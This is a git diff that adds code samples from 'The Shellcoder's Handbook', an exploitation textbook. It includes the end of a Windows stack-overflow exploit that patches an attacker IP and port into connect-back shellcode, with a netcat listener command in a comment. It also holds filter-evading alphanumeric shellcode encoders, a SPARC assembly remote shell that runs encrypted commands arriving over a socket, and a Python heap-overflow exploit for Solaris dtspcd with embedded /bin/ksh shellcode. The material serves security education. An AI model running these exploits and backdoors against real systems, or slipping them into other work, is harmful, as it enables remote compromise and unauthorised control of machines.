+            SetUpExploit(argv[1],atoi(argv[2]));
+
+            // name of the vulnerable program
+            strcpy(buffer,"nes ");
+            // copy exploit code to the buffer
+            strcat(buffer,exploit);
+
+            // Pad out the buffer	
+            while(cnt < 25)
+            {
+                    strcat(buffer,"\x90\x90\x90\x90");
+                    cnt ++;
+            }
+
+            strcat(buffer,"\x90\x90\x90\x90");
+
+            // Here's where we overwrite the saved return address
+            // This is the address of lstrcatA on Windows XP SP 1
+            // 0x77E74B66
+            strcat(buffer,"\x66\x4B\xE7\x77");
+
+            // Set the return address for lstrcatA
+            // this is where our code will be copied to
+            // in the TEB
+            strcat(buffer,"\xBC\xE1\xFD\x7F");
+
+            // Set the destination buffer for lstrcatA
+            // This is in the TEB and we'll return to
+            // here.
+            strcat(buffer,"\xBC\xE1\xFD\x7F");
+
+
+            // This is our source buffer. This is the address
+            // where we find our original buffer on the stack
+            strcat(buffer,"\x10\xFB\x12");
+
+            // Now execute the vulnerable program!
+            WinExec(buffer,SW_MAXIMIZE);
+
+            return 0;
+     }
+
+     int StartWinsock()
+     {
+            int err=0;
+            WORD wVersionRequested;
+            WSADATA wsaData;
+
+            wVersionRequested = MAKEWORD( 2, 0 );
+            err = WSAStartup( wVersionRequested, &wsaData );
+            if ( err != 0 )
+                    return 0;
+            if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsa-Data.wVersion ) != 0 )
+             {
+                    WSACleanup( );
+                    return 0;
+            }
+            return 0;
+     }
+     int SetUpExploit(char *myip, int myport)
+     {
+            unsigned int ip=0;
+            unsigned short prt=0;
+            char *ipt="";
+            char *prtt="";
+
+            ip = inet_addr(myip);
+
+            ipt = (char*)&ip;
+            exploit[191]=ipt[0];
+            exploit[192]=ipt[1];
+            exploit[193]=ipt[2];
+            exploit[194]=ipt[3];
+
+            // set the TCP port to connect on
+            // netcat should be listening on this port
+            // e.g. nc -l -p 53
+
+            prt = htons((unsigned short)myport);
+            prt = prt ^ 0xFFFF;
+            prtt = (char *) &prt;
+            exploit[209]=prtt[0];
+            exploit[210]=prtt[1];
+
+            return 0;
+     }
diff --git a/Chapter_09/Shellcoders09codesnippet01.txt b/Chapter_09/Shellcoders09codesnippet01.txt
new file mode 100644
index 0000000..9aafedb
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet01.txt
@@ -0,0 +1,22 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+00401066 80 00 42             add         byte ptr [eax],42h
+00401069 00 6D 00             add         byte ptr [ebp],ch
+0040106C 40                   inc         eax
+0040106D 00 6D 00             add         byte ptr [ebp],ch
+00401070 40                   inc         eax
+00401071 00 6D 00             add         byte ptr [ebp],ch
+
diff --git a/Chapter_09/Shellcoders09codesnippet02.txt b/Chapter_09/Shellcoders09codesnippet02.txt
new file mode 100644
index 0000000..d1cac37
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet02.txt
@@ -0,0 +1,31 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+0040B55E 6A 00                push        0
+0040B560 5B                   pop         ebx
+0040B564 43                   inc         ebx
+0040B568 53                   push        ebx
+0040B56C 54                   push        esp
+0040B570 58                   pop         eax
+0040B574 6B 00 39             imul        eax,dword ptr [eax],39h
+0040B57A 50                   push        eax
+0040B57E 5A                   pop         edx
+0040B582 54                   push        esp
+0040B586 58                   pop         eax
+0040B58A 6B 00 69             imul        eax,dword ptr [eax],69h
+0040B590 50                   push        eax
+0040B594 5B                   pop         ebx
+
diff --git a/Chapter_09/Shellcoders09codesnippet03.txt b/Chapter_09/Shellcoders09codesnippet03.txt
new file mode 100644
index 0000000..d5e1a9d
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet03.txt
@@ -0,0 +1,23 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+0040B5BA 54                   push        esp
+0040B5BE 58                   pop         eax
+0040B5C2 6B 00 41             imul        eax,dword ptr [eax],41h
+0040B5C5 00 41 00             add         byte ptr [ecx],al
+0040B5C8 41                   inc         ecx
+0040B5CC 41                   inc         ecx
+
diff --git a/Chapter_09/Shellcoders09codesnippet04.txt b/Chapter_09/Shellcoders09codesnippet04.txt
new file mode 100644
index 0000000..3ebe54d
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet04.txt
@@ -0,0 +1,25 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+0040B5BA 54                   push        esp
+0040B5BE 58                   pop         eax
+0040B5C2 6B 00 5B             imul        eax,dword ptr [eax],5Bh
+0040B5C5 00 41 00             add         byte ptr [ecx],al
+0040B5C8 46                   inc         esi
+0040B5C9 00 51 00             add         byte ptr [ecx],dl // <---- HERE
+0040B5CC 41                   inc         ecx
+0040B5D0 41                   inc         ecx
+
diff --git a/Chapter_09/Shellcoders09codesnippet05.txt b/Chapter_09/Shellcoders09codesnippet05.txt
new file mode 100644
index 0000000..90494eb
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet05.txt
@@ -0,0 +1,25 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #5
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+0040B5BA 54                   push        esp
+0040B5BE 58                   pop         eax
+0040B5C2 6B 00 5A             imul        eax,dword ptr [eax],5Ah
+0040B5C5 00 41 00             add         byte ptr [ecx],al
+0040B5C8 46                   inc         esi
+0040B5C9 00 59 00             add         byte ptr [ecx],bl // <---- HERE
+0040B5CC 41                   inc         ecx
+0040B5D0 41                   inc         ecx
+
diff --git a/Chapter_09/Shellcoders09codesnippet06.txt b/Chapter_09/Shellcoders09codesnippet06.txt
new file mode 100644
index 0000000..f618dfa
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet06.txt
@@ -0,0 +1,26 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #6
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+0040B5BA 54                   push        esp
+0040B5BE 58                   pop         eax
+0040B5C2 6B 00 64             imul        eax,dword ptr [eax],64h
+0040B5C5 00 41 00             add         byte ptr [ecx],al
+0040B5C8 46                   inc         esi 
+0040B5C9 00 59 00             add         byte ptr [ecx],bl       // <--- BL == 0x69
+0040B5CC 46                   inc         esi
+0040B5CD 00 51 00             add         byte ptr [ecx],dl       // <--- DL == 0x39
+0040B5D0 41                   inc         ecx
+0040B5D4 41                   inc         ecx
+
diff --git a/Chapter_09/Shellcoders09codesnippet07.txt b/Chapter_09/Shellcoders09codesnippet07.txt
new file mode 100644
index 0000000..795b3eb
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet07.txt
@@ -0,0 +1,27 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #7
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+0040B5BA 54                   push        esp
+0040B5BE 58                   pop         eax
+0040B5C2 6B 00 41             imul        eax,dword ptr [eax],41h
+0040B5C5 00 41 00             add         byte ptr [ecx],al
+0040B5C8 41                   inc         ecx                   
+// NOW ECX POINTS TO THE 0x5A IN THE DESTINATION BUFFER
+0040B5C9 00 59 00             add         byte ptr [ecx],bl     
+// <-- BL == 0x69 NON-null BYTE NOW EQUALS 0xC3
+0040B5CC 41                   inc         ecx
+0040B5CD 00 6D 00             add         byte ptr [ebp],ch
+
diff --git a/Chapter_09/Shellcoders09codesnippet08.txt b/Chapter_09/Shellcoders09codesnippet08.txt
new file mode 100644
index 0000000..78b39f2
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet08.txt
@@ -0,0 +1,39 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #8
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+
+
+004010B4 83 C7 23             add         edi,23h
+004010B7 33 C0                xor         eax,eax
+004010B9 33 C9                xor         ecx,ecx
+004010BB F7 D1                not         ecx
+004010BD F2 66 AF             repne scas  word ptr [edi]
+004010C0 F7 D1                not         ecx
+004010C2 D1 E1                shl         ecx,1
+004010C4 2B F9                sub         edi,ecx
+004010C6 83 E9 04             sub         ecx,4
+004010C9 47                   inc         edi
+
+here:
+004010CA 49                   dec         ecx
+004010CB 8A 14 0F             mov         dl,dword ptr [edi+ecx]
+004010CE 88 17                mov         byte ptr [edi],dl
+004010D0 47                   inc         edi
+004010D1 47                   inc         edi
+004010D2 49                   dec         ecx
+004010D3 49                   dec         ecx
+004010D4 49                   dec         ecx
+004010D5 75 F3                jne         here (004010ca)
+
diff --git a/Chapter_09/Shellcoders09codesnippet09.txt b/Chapter_09/Shellcoders09codesnippet09.txt
new file mode 100644
index 0000000..dcbf243
--- /dev/null
+++ b/Chapter_09/Shellcoders09codesnippet09.txt
@@ -0,0 +1,26 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Code Snippet #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+push eax
+pop ecx
+push 0
+pop eax
+inc eax
+push eax
+push esp
+pop eax
+imul eax,dword ptr[eax],0x00410041
+push eax
+pop ecx
diff --git a/Chapter_09/Shellcoders09sampleprogram01.c b/Chapter_09/Shellcoders09sampleprogram01.c
new file mode 100644
index 0000000..8a853e7
--- /dev/null
+++ b/Chapter_09/Shellcoders09sampleprogram01.c
@@ -0,0 +1,36 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+
+int main()
+{
+     char buffer[400]="aaaaaaaaj0X40HPZRXf5A9f5UVfPh0z00X5JEaBP”
+                      “YAAAAAAQhC000X5C7wvH4wPh00a0X527MqPh0”
+                      “0CCXf54wfPRXf5zzf5EefPh00M0X508aqH4uPh0G0”
+                      “0X50ZgnH48PRX5000050M00PYAQX4aHHfPRX40”
+                      “46PRXf50zf50bPYAAAAAAfQRXf50zf50oPYAAAfQ”
+                      “RX5555z5ZZZnPAAAAAAAAAAAAAAAAAAAAAAA”
+                      “AAAAAAAAAAAAAAAAAAAAAAAAEBEBEBEBEBE”
+                      “BEBEBEBEBEBEBEBEBEBEBEBEBEBEBQQ";
+     unsigned int x = 0;
+     x = &buffer;
+     __asm{
+
+mov esp,x
+             jmp esp
+             }
+     return 0;
+}
diff --git a/Chapter_09/Shellcoders09sampleprogram02.c b/Chapter_09/Shellcoders09sampleprogram02.c
new file mode 100644
index 0000000..a6e0a2c
--- /dev/null
+++ b/Chapter_09/Shellcoders09sampleprogram02.c
@@ -0,0 +1,47 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 9: Overcomming Filters
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+int main()
+{
+    unsigned char 
+    RealShell-code[]="\x55\x8B\xEC\x68\x30\x30\x30\x30\x58\x8B\xE5\x5D\xC3";
+    unsigned int count = 0, length=0, cnt=0;
+    unsigned char *ptr = null;
+    unsigned char a=0,b=0;
+
+    length = strlen(RealShellcode);
+    ptr = malloc((length + 1) * 2);
+    if(!ptr)
+        return printf("malloc() failed.\n");
+    ZeroMemory(ptr,(length+1)*2);
+    while(count < length)
+         {
+        a = b = RealShellcode[count];
+        a = a >> 4;
+        b = b << 4;
+        b = b >> 4;
+        a = a + 0x41;
+        b = b + 0x41;
+        ptr[cnt++] = a;
+        ptr[cnt++] = b;
+        count ++;
+        }
+    strcat(ptr,"QQ");
+    free(ptr);
+    return 0;
+}
diff --git a/Chapter_11/Shellcoders11-BF_shell.s b/Chapter_11/Shellcoders11-BF_shell.s
new file mode 100644
index 0000000..e29039e
--- /dev/null
+++ b/Chapter_11/Shellcoders11-BF_shell.s
@@ -0,0 +1,353 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 11: Advanced Solaris Exploitation
+Sample Program #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+.section      ".text"
+      .align 4
+      .global main
+      .type      main,#function
+      .proc      04
+main:
+      call      next
+      nop
+!use %i1 for SOCK
+next:
+      add      %o7, 0x368, %i2      !functable addr
+      
+      add      %i2, 40, %o0      !LDSO string
+      mov      0, %o1
+      mov      5, %g1            !SYS_open
+      ta      8
+
+      mov      %o0, %i4            !fd
+      mov      %o0, %o4              !fd
+      mov      0, %o0            !NULL      
+      sethi      %hi(16384000), %o1      !size
+      mov      1, %o2                  !PROT_READ
+      mov      2, %o3                  !MAP_PRIVATE
+      sethi        %hi(0x80000000), %g1
+      or        %g1, %o3, %o3
+      mov      0, %o5                  !offset
+      mov      115, %g1                  !SYS_mmap
+      ta      8
+      
+      mov      %i2, %l5            !need to store functable to temp reg
+      mov     %o0, %i5            !addr from mmap()
+      add      %i2, 64, %o1      !"_dlsym" string      
+      call      find_sym
+      nop
+      mov      %l5, %i2            !restore functable
+
+      mov      %o0, %i3            !location of _dlsym in ld.so.1
+
+      mov      %i5, %o0                  !addr
+      sethi      %hi(16384000), %o1      !size
+      mov      117, %g1                  !SYS_munmap
+      ta      8
+
+      mov      %i4, %o0                  !fd
+      mov      6, %g1                  !SYS_close
+      ta      8
+
+      sethi      %hi(0xff3b0000), %o0    !0xff3b0000 is ld.so base in every process
+      add      %i3, %o0, %i3            !address of _dlsym()
+      st      %i3, [ %i2 + 0 ]            !store _dlsym() in functable
+
+      mov      -2, %o0
+      add      %i2, 72, %o1            !"_dlopen" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 4]            !store _dlopen() in functable
+
+      mov      -2, %o0
+      add      %i2, 80, %o1            !"_popen" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 8]            !store _popen() in functable
+
+      mov      -2, %o0
+      add      %i2, 88, %o1            !"fread" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 12]            !store fread() in functable
+
+      mov      -2, %o0
+      add      %i2, 96, %o1            !"fclose" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 16]            !store fclose() in functable
+      
+      mov      -2, %o0
+      add      %i2, 104, %o1            !"strlen" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 20]            !store strlen() in functable
+
+      mov      -2, %o0
+      add      %i2, 112, %o1            !"memset" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 24]            !store memset() in functable
+
+
+      ld      [%i2 + 4], %o2            !_dlopen()
+      add      %i2, 120, %o0            !"/usr/local/ssl/lib/libcrypto.so" string
+      mov      257, %o1                  !RTLD_GLOBAL | RTLD_LAZY
+      call      %o2
+      nop
+
+      mov      -2, %o0
+      add      %i2, 152, %o1            !"BF_set_key" string
+      call      %i3
+      nop
+      st      %o0, [%i2 + 28]            !store BF_set_key() in func-table
+
+      mov      -2, %o0
+      add      %i2, 168, %o1            !"BF_cfb64_encrypt" string
+      call      %i3                        !call _dlsym()
+      nop
+      st      %o0, [%i2 + 32]            !store BF_cfb64_encrypt() in functable
+
+      !BF_set_key(&BF_KEY, 64, &KEY);
+      !this API overwrites %g2 and %g3
+      !take care!
+        add     %i2, 0xc8, %o2          ! KEY
+      mov      64, %o1                  ! 64
+      add      %i2, 0x110, %o0            ! BF_KEY
+        ld      [%i2 + 28], %o3         ! BF_set_key() pointer
+        call    %o3
+        nop      
+
+while_loop:
+
+      mov      %i1, %o0            !SOCKET
+      sethi      %hi(8192), %o2
+      
+      !reserve some space
+      sethi      %hi(0x2000), %l1
+      add      %i2, %l1, %i4            ! somewhere after BF_KEY
+
+      mov      %i4, %o1                  ! read buffer in %i4
+      mov      3, %g1                  ! SYS_read
+      ta      8
+
+      cmp      %o0, -1                  !len returned from read()
+      bne      proxy
+      nop
+      b      error_out                  !-1 returned exit process
+       nop
+
+proxy:
+      !BF_cfb64_encrypt(in, out, strlen(in), &key, ivec, &num, enc); DE-CRYPT
+      mov      %o0, %o2            ! length of in
+      mov      %i4, %o0            ! in
+      sethi   %hi(0x2060), %l1
+      add      %i4, %l1, %i5            !duplicate of out
+      add     %i4, %l1, %o1            ! out      
+        add     %i2, 0x110, %o3         ! key
+      sub      %o1, 0x40, %o4            ! ivec
+      st      %g0, [%o4]                  ! ivec = 0
+      sub      %o1, 0x8, %o5            ! &num
+      st      %g0, [%o5]                  ! num = 0
+      !hmm stack stuff..... put enc [%sp + XX]
+      st     %g0, [%sp+92]            !BF_DECRYPT    0
+        ld      [%i2 + 32], %l1       ! BF_cfb64_encrypt() pointer
+        call    %l1
+        nop      
+
+      mov      %i5, %o0                  ! read buffer
+      add      %i2, 192, %o1            ! "rw" string
+      ld      [%i2 + 8], %o2            ! _popen() pointer
+      call      %o2
+      nop
+
+      mov      %o0, %i3            ! store FILE *fp
+
+      mov      %i4, %o0            ! buf
+      sethi      %hi(8192), %o1            ! 8192
+      mov      1, %o2                  ! 1
+      mov      %i3, %o3                  ! fp
+      ld      [%i2 + 12], %o4            ! fread() pointer 
+      call      %o4
+      nop
+      
+      mov      %i4, %o0                  !buf
+      ld      [%i2 + 20], %o1            !strlen() pointer
+      call      %o1, 0
+      nop
+
+      !BF_cfb64_encrypt(in, out, strlen(in), &key, ivec, &num, enc); EN-CRYPT
+      mov      %o0, %o2                  ! length of in
+      mov      %i4, %o0                  ! in
+           mov      %o2, %i0                  ! store length for write(.., len) 
+        mov     %i5, %o1                 ! out
+        add     %i2, 0x110, %o3       ! key
+        sub     %i5, 0x40, %o4        ! ivec
+        st      %g0, [%o4]            ! ivec = 0
+        sub     %i5, 0x8, %o5         ! &num
+        st      %g0, [%o5]            ! num = 0
+      !hmm stack shit..... put enc [%sp + 92]
+      mov      1, %l1
+      st      %l1, [%sp+92]            !BF_ENCRYPT      1
+        ld      [%i2 + 32], %l1       ! BF_cfb64_encrypt() pointer
+        call    %l1
+        nop      
+
+      mov      %i0, %o2            !len to write()
+      mov      %i1, %o0            !SOCKET
+      mov      %i5, %o1            !buf
+      mov      4, %g1            !SYS_write
+      ta      8
+
+      mov      %i4, %o0                  !buf
+      mov      0, %o1                  !0x00
+      sethi      %hi(8192), %o2
+      or      %o2, 8, %o2                  !8192
+      ld      [%i2 + 24], %o3            !memset() pointer
+      call      %o3, 0
+      nop
+
+      mov      %i3, %o0
+      ld      [%i2 + 16], %o1       !fclose() pointer
+      call      %o1, 0
+      nop
+
+      b      while_loop
+      nop
+
+error_out:
+      mov      0, %o0
+      mov      1, %g1            !SYS_exit
+      ta       8
+
+! following assembly code is extracted from the -fPIC (position inde-pendent) 
+! compiled version of the C code presented in this section.
+! refer to find_sym.c for explanation of the following assembly routine.
+find_sym:
+      ld      [%o0 + 32], %g3
+      clr     %o2
+      lduh    [%o0 + 48], %g2
+      add     %o0, %g3, %g3
+      ba      f1
+      cmp     %o2, %g2
+f3:
+      add     %o2, 1, %o2
+      cmp     %o2, %g2
+      add     %g3, 40, %g3
+f1:
+      bge     f2
+      sll     %o5, 2, %g2
+      ld      [%g3 + 4], %g2
+      cmp     %g2, 11
+      bne,a        f3
+      lduh    [%o0 + 48], %g2
+      ld      [%g3 + 24], %o5
+      ld      [%g3 + 12], %o3
+      sll     %o5, 2, %g2
+f2:
+      ld      [%o0 + 32], %g3
+      add     %g2, %o5, %g2
+      sll     %g2, 3, %g2
+      add     %o0, %g3, %g3
+      add     %g3, %g2, %g3
+      ld      [%g3 + 12], %o5
+      and     %o0, -4, %g2
+      add     %o3, %g2, %o4
+      add     %o5, %g2, %o5
+f5:
+      add     %o4, 16, %o4
+f4:
+      ldub    [%o4 + 12], %g2
+      and     %g2, 15, %g2
+      cmp     %g2, 2
+      bne,a        f4
+      add     %o4, 16, %o4
+      ld      [%o4], %g2
+      mov     %o1, %o2
+      ldsb    [%o2], %g3
+      add     %o5, %g2, %o3
+      ldsb    [%o5 + %g2], %o0
+      cmp     %o0, %g3
+      bne     f5
+      add     %o2, 1, %o2
+      ldsb    [%o3], %g2
+f7:
+      cmp     %g2, 0
+      be      f6
+      add     %o3, 1, %o3
+      ldsb    [%o2], %g3
+      ldsb    [%o3], %g2
+      cmp     %g2, %g3
+      be      f7
+      add     %o2, 1, %o2
+      ba      f4
+      add     %o4, 16, %o4
+f6:
+      jmp     %o7 + 8
+      ld      [%o4 + 4], %o0
+functable:
+        .word 0xbabebab0        !_dlsym
+        .word 0xbabebab1        !_dlopen
+        .word 0xbabebab2        !_popen
+        .word 0xbabebab3        !fread
+        .word 0xbabebab4        !fclose
+        .word 0xbabebab5        !strlen
+        .word 0xbabebab6        !memset
+        .word 0xbabebab7        !BF_set_key
+        .word 0xbabebab8        !BF_cfb64_encrypt
+        .word 0xffffffff
+
+LDSO:
+        .asciz  "/usr/lib/ld.so.1"
+        .align 8
+DLSYM:
+        .asciz  "_dlsym"
+        .align 8
+DLOPEN:
+        .asciz  "_dlopen"
+        .align 8
+POPEN:
+        .asciz  "_popen"
+        .align 8
+FREAD:
+        .asciz  "fread"
+        .align 8
+FCLOSE:
+        .asciz  "fclose"
+        .align 8
+STRLEN:
+        .asciz  "strlen"
+        .align 8
+MEMSET:
+        .asciz  "memset"
+        .align 8
+LIBCRYPTO:
+        .asciz  "/usr/local/ssl/lib/libcrypto.so"
+        .align 8
+BFSETKEY:
+        .asciz  "BF_set_key"
+        .align 8
+BFENCRYPT:
+        .asciz  "BF_cfb64_encrypt"
+        .align 8
+RW:
+      .asciz      "rw"
+      .align 8
+KEY:      
+      .asciz
+      "6fa1d67f32d67d25a31ee78e487507224ddcc968743a9cb81c912a78ae0a0ea9"
+      .align 8
+BF_KEY:
+        .asciz  "12341234" !BF_KEY storage, actually its way larger 
+      .align 8  
diff --git a/Chapter_11/Shellcoders11-dtspcd-exploit.py b/Chapter_11/Shellcoders11-dtspcd-exploit.py
new file mode 100644
index 0000000..c93a2e0
--- /dev/null
+++ b/Chapter_11/Shellcoders11-dtspcd-exploit.py
@@ -0,0 +1,272 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 11: Advanced Solaris Exploitation
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+# noir@olympos.org || noir@uberhax0r.net
+# Sinan Eren (c) 2004
+# dtspcd heap overflow
+
+import socket
+import telnetlib
+import sys
+import string
+import struct
+import time
+import threading
+import random
+
+PORT = "6112"
+CHANNEL_ID = 2
+SPC_ABORT = 3
+SPC_REGISTER = 4
+
+
+class DTSPCDException(Exception):
+    
+    def __init__(self, args=None):
+        self.args = args
+        
+    def __str__(self):
+        return `self.args`
+
+class DTSPCDClient:
+    
+    def __init__(self):
+        self.seq = 1
+    
+    def spc_register(self, user, buf):
+        return "4 " + "\x00" + user + "\x00\x00" + "10" + "\x00" + buf
+    
+    def spc_write(self, buf, cmd):
+        self.data = "%08x%02x%04x%04x  " % (CHANNEL_ID, cmd, len(buf), self.seq)
+        self.seq += 1
+        self.data += buf
+        if self.sck.send(self.data) < len(self.data):
+            raise DTSPCDException, "network problem, packet not fully send"
+        
+    def spc_read(self):
+        
+        self.recvbuf = self.sck.recv(20)
+
+        if len(self.recvbuf) < 20:
+           raise  DTSPCDException, "network problem, packet not fully recvied"
+
+        self.chan = string.atol(self.recvbuf[:8], 16)
+        self.cmd =  string.atol(self.recvbuf[8:10], 16)
+        self.mbl =  string.atol(self.recvbuf[10:14], 16)
+        self.seqrecv = string.atol(self.recvbuf[14:18], 16)
+
+        #print "chan, cmd, len, seq: " , self.chan, self.cmd, self.mbl, self.seqrecv
+        
+        self.recvbuf = self.sck.recv(self.mbl)
+        
+        if len(self.recvbuf) < self.mbl:
+            raise  DTSPCDException, "network problem, packet not fully recvied"
+
+        return self.recvbuf
+        
+
+class DTSPCDExploit(DTSPCDClient):
+
+    def __init__(self, target, user="", port=PORT):
+        self.user = user
+        self.set_target(target)
+        self.set_port(port)
+        DTSPCDClient.__init__(self)
+        
+        #shellcode: write(0, "/bin/ksh", 8) + fcntl(0, F_DUP2FD, 0-1-2) + exec("/bin/ksh"...)
+        self.shellcode =\
+        "\xa4\x1c\x40\x11"+\
+        "\xa4\x1c\x40\x11"+\
+        "\xa4\x1c\x40\x11"+\
+        "\xa4\x1c\x40\x11"+\
+        "\xa4\x1c\x40\x11"+\
+        "\xa4\x1c\x40\x11"+\
+        "\x20\xbf\xff\xff"+\
+        "\x20\xbf\xff\xff"+\
+        "\x7f\xff\xff\xff"+\
+        "\xa2\x1c\x40\x11"+\
+        "\x90\x24\x40\x11"+\
+        "\x92\x10\x20\x09"+\
+        "\x94\x0c\x40\x11"+\
+        "\x82\x10\x20\x3e"+\
+        "\x91\xd0\x20\x08"+\
+        "\xa2\x04\x60\x01"+\
+        "\x80\xa4\x60\x02"+\
+        "\x04\xbf\xff\xfa"+\
+        "\x90\x23\xc0\x0f"+\
+        "\x92\x03\xe0\x58"+\
+        "\x94\x10\x20\x08"+\
+        "\x82\x10\x20\x04"+\
+        "\x91\xd0\x20\x08"+\
+        "\x90\x03\xe0\x58"+\
+        "\x92\x02\x20\x10"+\
+        "\xc0\x22\x20\x08"+\
+        "\xd0\x22\x20\x10"+\
+        "\xc0\x22\x20\x14"+\
+        "\x82\x10\x20\x0b"+\
+        "\x91\xd0\x20\x08"+\
+        "\x2f\x62\x69\x6e"+\
+        "\x2f\x6b\x73\x68"
+        
+    def set_user(self, user):
+        self.user = user
+
+    def get_user(self):
+        return self.user
+
+    def set_target(self, target):
+        try:
+            self.target = socket.gethostbyname(target)
+        except socket.gaierror, err:
+            raise DTSPCDException, "DTSPCDExploit, Host: " + target + " " + err[1]
+
+    def get_target(self):
+        return self.target
+
+    def set_port(self, port):
+        self.port = string.atoi(port)
+
+    def get_port(self):
+        return self.port
+    
+    def get_uname(self):
+
+        self.setup()
+        
+        self.uname_d = { "hostname": "", "os": "", "version": "", "arch": "" }
+
+        self.spc_write(self.spc_register("root", "\x00"), SPC_REGISTER)
+        
+        self.resp = self.spc_read()
+    
+        try:
+            self.resp = self.resp[self.resp.index("1000")+5:len(self.resp)-1]
+        except ValueError:
+            raise DTSPCDException, "Non standart response to REGISTER cmd"
+
+        self.resp = self.resp.split(":")
+        
+        self.uname_d = { "hostname": self.resp[0],\
+                         "os": self.resp[1],\
+                         "version": self.resp[2],\
+                         "arch": self.resp[3] }
